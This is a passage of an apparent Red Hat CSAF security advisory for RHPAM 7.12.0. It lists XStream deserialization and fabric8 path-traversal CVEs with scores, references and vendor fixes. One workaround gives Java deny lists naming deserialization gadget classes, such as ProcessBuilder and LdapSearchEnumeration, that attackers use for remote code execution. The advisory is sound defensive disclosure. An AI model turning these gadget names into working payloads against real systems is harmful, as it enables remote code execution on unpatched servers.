configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).", "product_ids": [ "RHPAM 7.12.0" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0296" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.4, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "products": [ "RHPAM 7.12.0" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "fabric8-kubernetes-client: vulnerable to a path traversal leading to integrity and availability compromise" }, { "cve": "CVE-2021-29505", "cwe": { "id": "CWE-502", "name": "Deserialization of Untrusted Data" }, "discovery_date": "2021-05-28T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1966735" } ], "notes": [ { "category": "description", "text": "A flaw was found in XStream. By manipulating the processed input stream, a remote attacker may be able to obtain sufficient rights to execute commands. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "XStream: remote command execution attack by manipulating the processed input stream", "title": "Vulnerability summary" }, { "category": "other", "text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. 
Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\nCodeReady Studio 12 ships a version of xstream that is affected by this flaw as a transitive dependency for the Wise framework plugin. However, the vulnerable code is not called, so this flaw has been marked as Low severity for CodeReady Studio 12.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "RHPAM 7.12.0" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-29505" }, { "category": "external", "summary": "RHBZ#1966735", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1966735" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-29505", "url": "https://www.cve.org/CVERecord?id=CVE-2021-29505" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-29505", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29505" }, { "category": "external", "summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-7chv-rrw6-w6fc", "url": "https://github.com/x-stream/xstream/security/advisories/GHSA-7chv-rrw6-w6fc" }, { "category": "external", "summary": "https://x-stream.github.io/CVE-2021-29505.html", "url": "https://x-stream.github.io/CVE-2021-29505.html" } ], "release_date": "2021-05-14T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-26T15:52:53+00:00", "details": "For on-premise installations, before applying the update, back up your existing installation, 
including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).", "product_ids": [ "RHPAM 7.12.0" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0296" }, { "category": "workaround", "details": "Depending on the version of XStream used there are various usage patterns that mitigate this flaw, though we would strongly recommend using the allow list approach if at all possible as there are likely more class combinations the deny list approach may not address.\n\nAllow list approach\n```java\nXStream xstream = new XStream();\nXStream.setupDefaultSecurity(xstream);\nxstream.allowTypesByWildcard(new String[] {\"com.misc.classname\"})\n```\nDeny list for XStream 1.4.16 (this should also address some previous flaws found in 1.4.7 - \u003e 1.4.15) \n```java\nxstream.denyTypesByRegExp(new String[]{ \".*\\\\.Lazy(?:Search)?Enumeration.*\", \"(?:java|sun)\\\\.rmi\\\\..*\" });\n```\n\nDeny list for XStream 1.4.15\n```java\nxstream.denyTypes(new String[]{ \"sun.awt.datatransfer.DataTransferer$IndexOrderComparator\", \"sun.swing.SwingLazyValue\", \"com.sun.corba.se.impl.activation.ServerTableEntry\", \"com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator\" });\nxstream.denyTypesByRegExp(new String[]{ \".*\\\\$ServiceNameIterator\", \"javafx\\\\.collections\\\\.ObservableList\\\\$.*\", \".*\\\\.bcel\\\\..*\\\\.util\\\\.ClassLoader\" });\nxstream.denyTypeHierarchy(java.io.InputStream.class );\nxstream.denyTypeHierarchy(java.nio.channels.Channel.class );\nxstream.denyTypeHierarchy(javax.activation.DataSource.class 
);\nxstream.denyTypeHierarchy(javax.sql.rowset.BaseRowSet.class );\n```\n\nDeny list for XStream 1.4.13\n```java\nxstream.denyTypes(new String[]{ \"javax.imageio.ImageIO$ContainsFilter\" });\nxstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });\n```\n\nDeny list for XStream 1.4.7 -\u003e 1.4.12\n```java\nxstream.denyTypes(new String[]{ \"javax.imageio.ImageIO$ContainsFilter\" });\nxstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });\n```\n\nDeny list for versions prior to XStream 1.4.7\n```java\nxstream.registerConverter(new Converter() {\n public boolean canConvert(Class type) {\n return type != null \u0026\u0026 (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class || type == java.lang.Void.class || void.class || type.getName().equals(\"javax.imageio.ImageIO$ContainsFilter\") || Proxy.isProxy(type));\n }\n\n public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {\n throw new ConversionException(\"Unsupported type due to security reasons.\");\n }\n\n public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {\n throw new ConversionException(\"Unsupported type due to security reasons.\");\n }\n}, XStream.PRIORITY_LOW);\n```", "product_ids": [ "RHPAM 7.12.0" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "RHPAM 7.12.0" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "XStream: remote command execution attack by manipulating the processed input stream" }, { "cve": "CVE-2021-39139", 
"cwe": { "id": "CWE-502", "name": "Deserialization of Untrusted Data" }, "discovery_date": "2021-08-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1997763" } ], "notes": [ { "category": "description", "text": "A flaw was found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to load and execute arbitrary code from a remote host by manipulating the processed input stream. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "xstream: Arbitrary code execution via unsafe deserialization of Xalan xsltc.trax.TemplatesImpl", "title": "Vulnerability summary" }, { "category": "other", "text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. XStream 1.4.18 no longer uses a blacklist by default since it cannot be secured for general purposes.\n\nOpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. 
Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, the OCP Jenkins package is not affected by this flaw.\nThis version of the XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "RHPAM 7.12.0" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-39139" }, { "category": "external", "summary": "RHBZ#1997763", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997763" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-39139", "url": "https://www.cve.org/CVERecord?id=CVE-2021-39139" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39139", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39139" }, { "category": "external", "summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-64xx-cq4q-mf44", "url": "https://github.com/x-stream/xstream/security/advisories/GHSA-64xx-cq4q-mf44" } ], "release_date": "2021-08-22T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-26T15:52:53+00:00", "details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe 
References section of this erratum contains a download link (you must log in to download the update).", "product_ids": [ "RHPAM 7.12.0" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0296" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "products": [ "RHPAM 7.12.0" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "xstream: Arbitrary code execution via unsafe deserialization of Xalan xsltc.trax.TemplatesImpl" }, { "cve": "CVE-2021-39140", "cwe": { "id": "CWE-502", "name": "Deserialization of Untrusted Data" }, "discovery_date": "2021-08-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1997765" } ], "notes": [ { "category": "description", "text": "XStream is a simple library to serialize objects to XML and back again. In affected versions this vulnerability may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream\u0027s security framework with a whitelist limited to the minimal required types. 
XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.", "title": "Vulnerability description" }, { "category": "summary", "text": "xstream: Infinite loop DoS via unsafe deserialization of sun.reflect.annotation.AnnotationInvocationHandler", "title": "Vulnerability summary" }, { "category": "other", "text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\nThis version of XStream library will be delivered in the future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "RHPAM 7.12.0" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-39140" }, { "category": "external", "summary": "RHBZ#1997765", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997765" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-39140", "url": "https://www.cve.org/CVERecord?id=CVE-2021-39140" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39140", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39140" }, { "category": "external", "summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-6wf9-jmg9-vxcc", "url": "https://github.com/x-stream/xstream/security/advisories/GHSA-6wf9-jmg9-vxcc" } ], "release_date": "2021-08-22T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": 
"2022-01-26T15:52:53+00:00", "details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).", "product_ids": [ "RHPAM 7.12.0" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0296" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "RHPAM 7.12.0" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "xstream: Infinite loop DoS via unsafe deserialization of sun.reflect.annotation.AnnotationInvocationHandler" }, { "cve": "CVE-2021-39141", "cwe": { "id": "CWE-434", "name": "Unrestricted Upload of File with Dangerous Type" }, "discovery_date": "2021-08-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1997769" } ], "notes": [ { "category": "description", "text": "A flaw was found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to load and execute arbitrary code from a remote host by manipulating the processed input stream. 
The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.xml.internal.ws.client.sei.*", "title": "Vulnerability summary" }, { "category": "other", "text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. XStream 1.4.18 no longer uses a blacklist by default since it cannot be secured for general purposes.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "RHPAM 7.12.0" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-39141" }, { "category": "external", "summary": "RHBZ#1997769", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997769" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-39141", "url": "https://www.cve.org/CVERecord?id=CVE-2021-39141" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39141", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39141" }, { "category": "external", "summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-g5w6-mrj7-75h2", "url": "https://github.com/x-stream/xstream/security/advisories/GHSA-g5w6-mrj7-75h2" } ], "release_date": "2021-08-22T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-26T15:52:53+00:00", "details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and 
database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).", "product_ids": [ "RHPAM 7.12.0" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0296" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "products": [ "RHPAM 7.12.0" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.xml.internal.ws.client.sei.*" }, { "cve": "CVE-2021-39144", "cwe": { "id": "CWE-502", "name": "Deserialization of Untrusted Data" }, "discovery_date": "2021-08-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1997772" } ], "notes": [ { "category": "description", "text": "A flaw was found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to load and execute arbitrary code from a remote host by manipulating the processed input stream.", "title": "Vulnerability description" }, { "category": "summary", "text": "xstream: Arbitrary code execution via unsafe deserialization of sun.tracing.*", "title": "Vulnerability summary" }, { "category": "other", "text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. 
XStream 1.4.18 no longer uses a blacklist by default since it cannot be secured for general purposes.\n\nOpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\nThis version of XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security\n\nFor more information, please refer to the [Red Hat solution Article](https://access.redhat.com/solutions/7002450) explaining this issue.\n\nOpenShift Logging\u0027s Elasticsearch 6.8.1 using opendistro_security v0.10.1.2 is not affected by the vulnerable code because com.thoughtworks.xstream is only a build-time dependency.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "RHPAM 7.12.0" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-39144" }, { "category": "external", "summary": "RHBZ#1997772", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997772" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-39144", "url": "https://www.cve.org/CVERecord?id=CVE-2021-39144" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39144", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39144" }, { "category": "external", "summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-j9h8-phrw-h4fh", "url": "https://github.com/x-stream/xstream/security/advisories/GHSA-j9h8-phrw-h4fh" }, { "category": "external", 
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-08-22T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-26T15:52:53+00:00", "details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).", "product_ids": [ "RHPAM 7.12.0" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0296" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "products": [ "RHPAM 7.12.0" ] } ], "threats": [ { "category": "exploit_status", "date": "2023-03-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Low" } ], "title": "xstream: Arbitrary code execution via unsafe deserialization of sun.tracing.*" }, { "cve": "CVE-2021-39145", "cwe": { "id": "CWE-502", "name": "Deserialization of Untrusted Data" }, "discovery_date": "2021-08-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1997775" } ], "notes": [ { "category": "description", "text": "A flaw was found in xstream, a simple library used to serialize objects 
to XML and back again. This flaw allows a remote attacker to load and execute arbitrary code from a remote host by manipulating the processed input stream. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.ldap.LdapBindingEnumeration", "title": "Vulnerability summary" }, { "category": "other", "text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. XStream 1.4.18 no longer uses a blacklist by default since it cannot be secured for general purposes.\n\nOpenShift Container Platform (OCP) delivers the Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, the OCP Jenkins package is not affected by this flaw.\nThis version of the XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "RHPAM 7.12.0" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-39145" }, { "category": "external", "summary": "RHBZ#1997775", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997775" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-39145", "url": "https://www.cve.org/CVERecord?id=CVE-2021-39145" }, { "category": "external", "summary": 
"https://nvd.nist.gov/vuln/detail/CVE-2021-39145", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39145" }, { "category": "external", "summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-8jrj-525p-826v", "url": "https://github.com/x-stream/xstream/security/advisories/GHSA-8jrj-525p-826v" } ], "release_date": "2021-08-22T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-26T15:52:53+00:00", "details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).", "product_ids": [ "RHPAM 7.12.0" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0296" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "products": [ "RHPAM 7.12.0" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.ldap.LdapBindingEnumeration" }, { "cve": "CVE-2021-39146", "cwe": { "id": "CWE-434", "name": "Unrestricted Upload of File with Dangerous Type" }, "discovery_date": "2021-08-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1997777" } ], "notes": [ { "category": "description", "text": "A flaw was 
found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to load and execute arbitrary code from a remote host by manipulating the processed input stream. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "xstream: Arbitrary code execution via unsafe deserialization of javax.swing.UIDefaults$ProxyLazyValue", "title": "Vulnerability summary" }, { "category": "other", "text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. XStream 1.4.18 no longer uses a blacklist by default since it cannot be secured for general purposes.\n\nOpenShift Container Platform (OCP) delivers the Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, the OCP Jenkins package is not affected by this flaw.\nThis version of the XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "RHPAM 7.12.0" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-39146" }, { "category": "external", "summary": "RHBZ#1997777", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997777" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-39146", "url": 
"https://www.cve.org/CVERecord?id=CVE-2021-39146" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39146", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39146" }, { "category": "external", "summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-p8pq-r894-fm8f", "url": "https://github.com/x-stream/xstream/security/advisories/GHSA-p8pq-r894-fm8f" } ], "release_date": "2021-08-22T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-26T15:52:53+00:00", "details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).", "product_ids": [ "RHPAM 7.12.0" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0296" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "products": [ "RHPAM 7.12.0" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "xstream: Arbitrary code execution via unsafe deserialization of javax.swing.UIDefaults$ProxyLazyValue" }, { "cve": "CVE-2021-39147", "cwe": { "id": "CWE-434", "name": "Unrestricted Upload of File with Dangerous Type" }, "discovery_date": "2021-08-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", 
"text": "1997779" } ], "notes": [ { "category": "description", "text": "A flaw was found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to load and execute arbitrary code from a remote host by manipulating the processed input stream. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.ldap.LdapSearchEnumeration", "title": "Vulnerability summary" }, { "category": "other", "text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. XStream 1.4.18 no longer uses a blacklist by default since it cannot be secured for general purposes.\n\nOpenShift Container Platform (OCP) delivers the Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, the OCP Jenkins package is not affected by this flaw.\nThis version of the XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "RHPAM 7.12.0" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-39147" }, { "category": "external", "summary": "RHBZ#1997779", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997779" }, { "category": "external", "summary": 
"https://www.cve.org/CVERecord?id=CVE-2021-39147", "url": "https://www.cve.org/CVERecord?id=CVE-2021-39147" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39147", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39147" }, { "category": "external", "summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-h7v4-7xg3-hxcc", "url": "https://github.com/x-stream/xstream/security/advisories/GHSA-h7v4-7xg3-hxcc" } ], "release_date": "2021-08-22T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-26T15:52:53+00:00", "details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).", "product_ids": [ "RHPAM 7.12.0" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0296" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": 